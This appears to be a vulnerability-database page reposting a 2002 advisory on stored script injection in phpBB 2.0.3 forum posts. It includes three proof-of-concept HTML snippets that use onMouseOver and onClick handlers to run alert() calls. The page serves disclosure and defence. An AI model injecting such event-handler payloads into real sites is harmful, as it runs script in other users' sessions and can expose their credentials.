phpBB 2.0.3 – Script Injection

phpBB 2.0.3 – Script Injection

漏洞ID 1053645 漏洞类型
发布时间 2002-11-25 更新时间 2002-11-25
图片[1]-phpBB 2.0.3 – Script Injection-安全小百科CVE编号 N/A
图片[2]-phpBB 2.0.3 – Script Injection-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22043
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/6248/info

phpBB does not properly sanitize user input in forum postings. This could allow a malicious user to inject script code into a forum post which would in turn be executed when the page is viewed by other users.

Script code would be executed in the security context of the phpBB site.

Supplied script code may access authentication credentials, or take actions as an authenticated user.

<b onMouseOver="alert(document.location);">This piece of text could be
dangerous if you were to move your mouse over it!</b>

<i onClick="alert(document.location);">This piece of text could be dangerous
if you were to click it!</i>

<u onClick="alert('Hello');">This piece of text could be dangerous if you
were to click it!</u>

相关推荐: Working Resources BadBlue Information Disclosure Vulnerability

Working Resources BadBlue Information Disclosure Vulnerability 漏洞ID 1101237 漏洞类型 Access Validation Error 发布时间 2002-11-25 更新时间 2002…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享